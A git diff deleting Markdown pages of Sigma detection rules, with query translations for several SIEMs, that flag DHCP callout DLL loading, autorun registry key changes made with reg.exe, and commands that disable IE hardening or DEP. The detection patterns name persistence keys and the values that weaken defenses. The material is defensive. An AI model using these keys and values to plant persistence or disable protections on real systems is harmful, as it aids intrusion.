-| **Description**          | This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1073: DLL Side-Loading](https://attack.mitre.org/techniques/T1073)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html](https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html)</li><li>[https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx](https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx)</li><li>[https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx](https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx)</li></ul>  |
-| **Author**               | Dimitrios Slamaris |
-| Other Tags           | <ul><li>attack.t1574.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: DHCP Server Loaded the CallOut DLL
-id: 13fc89a9-971e-4ca6-b9dc-aa53a445bf40
-status: experimental
-description: This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded
-references:
-    - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html
-    - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx
-    - https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx
-date: 2017/05/15
-author: Dimitrios Slamaris
-tags:
-    - attack.defense_evasion
-    - attack.t1073
-    - attack.t1574.002
-logsource:
-    product: windows
-    service: system
-detection:
-    selection:
-        EventID: 1033
-        Source: Microsoft-Windows-DHCP-Server
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName System | where {($_.ID -eq "1033" -and $_.message -match "Source.*Microsoft-Windows-DHCP-Server") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"1033" AND winlog.event_data.Source:"Microsoft\-Windows\-DHCP\-Server")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/13fc89a9-971e-4ca6-b9dc-aa53a445bf40 <<EOF
-{
-  "metadata": {
-    "title": "DHCP Server Loaded the CallOut DLL",
-    "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1073",
-      "attack.t1574.002"
-    ],
-    "query": "(winlog.event_id:\"1033\" AND winlog.event_data.Source:\"Microsoft\\-Windows\\-DHCP\\-Server\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"1033\" AND winlog.event_data.Source:\"Microsoft\\-Windows\\-DHCP\\-Server\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'DHCP Server Loaded the CallOut DLL'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"1033" AND Source:"Microsoft\-Windows\-DHCP\-Server")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:System" EventCode="1033" Source="Microsoft-Windows-DHCP-Server")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="1033" Source="Microsoft-Windows-DHCP-Server")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*1033)(?=.*Microsoft-Windows-DHCP-Server))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_dhcp_config_failed.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_dhcp_config_failed.md
deleted file mode 100644
index ecad165..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_dhcp_config_failed.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | DHCP Server Error Failed Loading the CallOut DLL       |
-|:-------------------------|:------------------|
-| **Description**          | This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1073: DLL Side-Loading](https://attack.mitre.org/techniques/T1073)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html](https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html)</li><li>[https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx](https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx)</li><li>[https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx](https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx)</li></ul>  |
-| **Author**               | Dimitrios Slamaris, @atc_project (fix) |
-| Other Tags           | <ul><li>attack.t1574.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: DHCP Server Error Failed Loading the CallOut DLL
-id: 75edd3fd-7146-48e5-9848-3013d7f0282c
-description: This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded
-status: experimental
-references:
-    - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html
-    - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx
-    - https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx
-date: 2017/05/15
-modified: 2019/07/17
-tags:
-    - attack.defense_evasion
-    - attack.t1073
-    - attack.t1574.002
-author: "Dimitrios Slamaris, @atc_project (fix)"
-logsource:
-    product: windows
-    service: system
-detection:
-    selection:
-        EventID:
-            - 1031
-            - 1032
-            - 1034
-        Source: Microsoft-Windows-DHCP-Server
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName System | where {(($_.ID -eq "1031" -or $_.ID -eq "1032" -or $_.ID -eq "1034") -and $_.message -match "Source.*Microsoft-Windows-DHCP-Server") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:("1031" OR "1032" OR "1034") AND winlog.event_data.Source:"Microsoft\-Windows\-DHCP\-Server")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/75edd3fd-7146-48e5-9848-3013d7f0282c <<EOF
-{
-  "metadata": {
-    "title": "DHCP Server Error Failed Loading the CallOut DLL",
-    "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1073",
-      "attack.t1574.002"
-    ],
-    "query": "(winlog.event_id:(\"1031\" OR \"1032\" OR \"1034\") AND winlog.event_data.Source:\"Microsoft\\-Windows\\-DHCP\\-Server\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:(\"1031\" OR \"1032\" OR \"1034\") AND winlog.event_data.Source:\"Microsoft\\-Windows\\-DHCP\\-Server\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'DHCP Server Error Failed Loading the CallOut DLL'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:("1031" "1032" "1034") AND Source:"Microsoft\-Windows\-DHCP\-Server")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:System" (EventCode="1031" OR EventCode="1032" OR EventCode="1034") Source="Microsoft-Windows-DHCP-Server")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id IN ["1031", "1032", "1034"] Source="Microsoft-Windows-DHCP-Server")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*1031|.*1032|.*1034))(?=.*Microsoft-Windows-DHCP-Server))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_direct_asep_reg_keys_modification.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_direct_asep_reg_keys_modification.md
deleted file mode 100644
index 9b90944..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_direct_asep_reg_keys_modification.md
+++ /dev/null
@@ -1,192 +0,0 @@
-| Title                    | Direct Autorun Keys Modification       |
-|:-------------------------|:------------------|
-| **Description**          | Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1060: Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1060)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason</li><li>Legitimate administrator sets up autorun keys for legitimate reason</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1060/T1060.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1060/T1060.yaml)</li></ul>  |
-| **Author**               | Victor Sergeev, Daniil Yugoslavskiy, oscd.community |
-| Other Tags           | <ul><li>attack.t1547.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Direct Autorun Keys Modification
-id: 24357373-078f-44ed-9ac4-6d334a668a11
-description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.
-status: experimental
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1060/T1060.yaml
-tags:
-    - attack.persistence
-    - attack.t1060
-    - attack.t1547.001
-date: 2019/10/25
-modified: 2019/11/10
-author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection_1:
-        Image|endswith: '*\reg.exe'
-        CommandLine|contains: 'add' # to avoid intersection with discovery tactic rules
-    selection_2:
-        CommandLine|contains:       # need to improve this list, there are plenty of ASEP reg keys
-            - '\software\Microsoft\Windows\CurrentVersion\Run'
-            - '\software\Microsoft\Windows\CurrentVersion\RunOnce'
-            - '\software\Microsoft\Windows\CurrentVersion\RunOnceEx'
-            - '\software\Microsoft\Windows\CurrentVersion\RunServices'
-            - '\software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
-            - '\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit'
-            - '\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell'
-            - '\software\Microsoft\Windows NT\CurrentVersion\Windows'
-            - '\software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders'
-            - '\system\CurrentControlSet\Control\SafeBoot\AlternateShell'
-    condition: selection_1 and selection_2
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
-    - Legitimate administrator sets up autorun keys for legitimate reason
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\reg.exe" -and $_.message -match "CommandLine.*.*add.*" -and ($_.message -match "CommandLine.*.*\\software\\Microsoft\\Windows\\CurrentVersion\\Run.*" -or $_.message -match "CommandLine.*.*\\software\\Microsoft\\Windows\\CurrentVersion\\RunOnce.*" -or $_.message -match "CommandLine.*.*\\software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx.*" -or $_.message -match "CommandLine.*.*\\software\\Microsoft\\Windows\\CurrentVersion\\RunServices.*" -or $_.message -match "CommandLine.*.*\\software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce.*" -or $_.message -match "CommandLine.*.*\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit.*" -or $_.message -match "CommandLine.*.*\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell.*" -or $_.message -match "CommandLine.*.*\\software\\Microsoft\\Windows NT\\CurrentVersion\\Windows.*" -or $_.message -match "CommandLine.*.*\\software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders.*" -or $_.message -match "CommandLine.*.*\\system\\CurrentControlSet\\Control\\SafeBoot\\AlternateShell.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\reg.exe AND winlog.event_data.CommandLine.keyword:*add* AND winlog.event_data.CommandLine.keyword:(*\\software\\Microsoft\\Windows\\CurrentVersion\\Run* OR *\\software\\Microsoft\\Windows\\CurrentVersion\\RunOnce* OR *\\software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx* OR *\\software\\Microsoft\\Windows\\CurrentVersion\\RunServices* OR *\\software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce* OR *\\software\\Microsoft\\Windows\ NT\\CurrentVersion\\Winlogon\\Userinit* OR *\\software\\Microsoft\\Windows\ NT\\CurrentVersion\\Winlogon\\Shell* OR *\\software\\Microsoft\\Windows\ NT\\CurrentVersion\\Windows* OR *\\software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User\ Shell\ Folders* OR *\\system\\CurrentControlSet\\Control\\SafeBoot\\AlternateShell*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/24357373-078f-44ed-9ac4-6d334a668a11 <<EOF
-{
-  "metadata": {
-    "title": "Direct Autorun Keys Modification",
-    "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.",
-    "tags": [
-      "attack.persistence",
-      "attack.t1060",
-      "attack.t1547.001"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\reg.exe AND winlog.event_data.CommandLine.keyword:*add* AND winlog.event_data.CommandLine.keyword:(*\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run* OR *\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce* OR *\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx* OR *\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunServices* OR *\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunServicesOnce* OR *\\\\software\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit* OR *\\\\software\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\Shell* OR *\\\\software\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Windows* OR *\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User\\ Shell\\ Folders* OR *\\\\system\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\AlternateShell*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\reg.exe AND winlog.event_data.CommandLine.keyword:*add* AND winlog.event_data.CommandLine.keyword:(*\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run* OR *\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce* OR *\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx* OR *\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunServices* OR *\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunServicesOnce* OR *\\\\software\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit* OR *\\\\software\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\Shell* OR *\\\\software\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Windows* OR *\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User\\ Shell\\ Folders* OR *\\\\system\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\AlternateShell*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Direct Autorun Keys Modification'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\reg.exe AND CommandLine.keyword:*add* AND CommandLine.keyword:(*\\software\\Microsoft\\Windows\\CurrentVersion\\Run* *\\software\\Microsoft\\Windows\\CurrentVersion\\RunOnce* *\\software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx* *\\software\\Microsoft\\Windows\\CurrentVersion\\RunServices* *\\software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce* *\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit* *\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell* *\\software\\Microsoft\\Windows NT\\CurrentVersion\\Windows* *\\software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders* *\\system\\CurrentControlSet\\Control\\SafeBoot\\AlternateShell*))
-```
-
-
-### splunk
-    
-```
-(Image="*\\reg.exe" CommandLine="*add*" (CommandLine="*\\software\\Microsoft\\Windows\\CurrentVersion\\Run*" OR CommandLine="*\\software\\Microsoft\\Windows\\CurrentVersion\\RunOnce*" OR CommandLine="*\\software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx*" OR CommandLine="*\\software\\Microsoft\\Windows\\CurrentVersion\\RunServices*" OR CommandLine="*\\software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce*" OR CommandLine="*\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit*" OR CommandLine="*\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell*" OR CommandLine="*\\software\\Microsoft\\Windows NT\\CurrentVersion\\Windows*" OR CommandLine="*\\software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders*" OR CommandLine="*\\system\\CurrentControlSet\\Control\\SafeBoot\\AlternateShell*")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\reg.exe" CommandLine="*add*" CommandLine IN ["*\\software\\Microsoft\\Windows\\CurrentVersion\\Run*", "*\\software\\Microsoft\\Windows\\CurrentVersion\\RunOnce*", "*\\software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx*", "*\\software\\Microsoft\\Windows\\CurrentVersion\\RunServices*", "*\\software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce*", "*\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit*", "*\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell*", "*\\software\\Microsoft\\Windows NT\\CurrentVersion\\Windows*", "*\\software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders*", "*\\system\\CurrentControlSet\\Control\\SafeBoot\\AlternateShell*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\reg\.exe)(?=.*.*add.*)(?=.*(?:.*.*\software\Microsoft\Windows\CurrentVersion\Run.*|.*.*\software\Microsoft\Windows\CurrentVersion\RunOnce.*|.*.*\software\Microsoft\Windows\CurrentVersion\RunOnceEx.*|.*.*\software\Microsoft\Windows\CurrentVersion\RunServices.*|.*.*\software\Microsoft\Windows\CurrentVersion\RunServicesOnce.*|.*.*\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit.*|.*.*\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell.*|.*.*\software\Microsoft\Windows NT\CurrentVersion\Windows.*|.*.*\software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders.*|.*.*\system\CurrentControlSet\Control\SafeBoot\AlternateShell.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_disable_ie_features.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_disable_ie_features.md
deleted file mode 100644
index f3b8403..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_disable_ie_features.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Disabled IE Security Features       |
-|:-------------------------|:------------------|
-| **Description**          | Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** | <ul><li>[T1089: Disabling Security Tools](https://attack.mitre.org/techniques/T1089)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown, maybe some security software installer disables these features temporarily</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/](https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Disabled IE Security Features
-id: fb50eb7a-5ab1-43ae-bcc9-091818cb8424
-status: experimental
-description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features
-references:
-    - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/
-tags:
-    - attack.t1089
-author: Florian Roth 
-date: 2020/06/19
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        CommandLine|contains|all:
-            - ' -name IEHarden '
-            - ' -value 0 '        
-    selection2:
-        CommandLine|contains|all:
-            - ' -name DEPOff '
-            - ' -value 1 '
-    selection3:
-        CommandLine|contains|all:
-            - ' -name DisableFirstRunCustomize '
-            - ' -value 2 '
-    condition: 1 of them
-falsepositives:
-    - Unknown, maybe some security software installer disables these features temporarily
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "CommandLine.*.* -name IEHarden .*" -and $_.message -match "CommandLine.*.* -value 0 .*") -or ($_.message -match "CommandLine.*.* -name DEPOff .*" -and $_.message -match "CommandLine.*.* -value 1 .*") -or ($_.message -match "CommandLine.*.* -name DisableFirstRunCustomize .*" -and $_.message -match "CommandLine.*.* -value 2 .*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.CommandLine.keyword:*\ \-name\ IEHarden\ * AND winlog.event_data.CommandLine.keyword:*\ \-value\ 0\ *) OR (winlog.event_data.CommandLine.keyword:*\ \-name\ DEPOff\ * AND winlog.event_data.CommandLine.keyword:*\ \-value\ 1\ *) OR (winlog.event_data.CommandLine.keyword:*\ \-name\ DisableFirstRunCustomize\ * AND winlog.event_data.CommandLine.keyword:*\ \-value\ 2\ *))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/fb50eb7a-5ab1-43ae-bcc9-091818cb8424 <<EOF
-{
-  "metadata": {
-    "title": "Disabled IE Security Features",
-    "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features",
-    "tags": [
-      "attack.t1089"
-    ],
-    "query": "((winlog.event_data.CommandLine.keyword:*\\ \\-name\\ IEHarden\\ * AND winlog.event_data.CommandLine.keyword:*\\ \\-value\\ 0\\ *) OR (winlog.event_data.CommandLine.keyword:*\\ \\-name\\ DEPOff\\ * AND winlog.event_data.CommandLine.keyword:*\\ \\-value\\ 1\\ *) OR (winlog.event_data.CommandLine.keyword:*\\ \\-name\\ DisableFirstRunCustomize\\ * AND winlog.event_data.CommandLine.keyword:*\\ \\-value\\ 2\\ *))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.CommandLine.keyword:*\\ \\-name\\ IEHarden\\ * AND winlog.event_data.CommandLine.keyword:*\\ \\-value\\ 0\\ *) OR (winlog.event_data.CommandLine.keyword:*\\ \\-name\\ DEPOff\\ * AND winlog.event_data.CommandLine.keyword:*\\ \\-value\\ 1\\ *) OR (winlog.event_data.CommandLine.keyword:*\\ \\-name\\ DisableFirstRunCustomize\\ * AND winlog.event_data.CommandLine.keyword:*\\ \\-value\\ 2\\ *))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Disabled IE Security Features'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((CommandLine.keyword:* \-name IEHarden * AND CommandLine.keyword:* \-value 0 *) OR (CommandLine.keyword:* \-name DEPOff * AND CommandLine.keyword:* \-value 1 *) OR (CommandLine.keyword:* \-name DisableFirstRunCustomize * AND CommandLine.keyword:* \-value 2 *))
-```
-
-
-### splunk
-    
-```
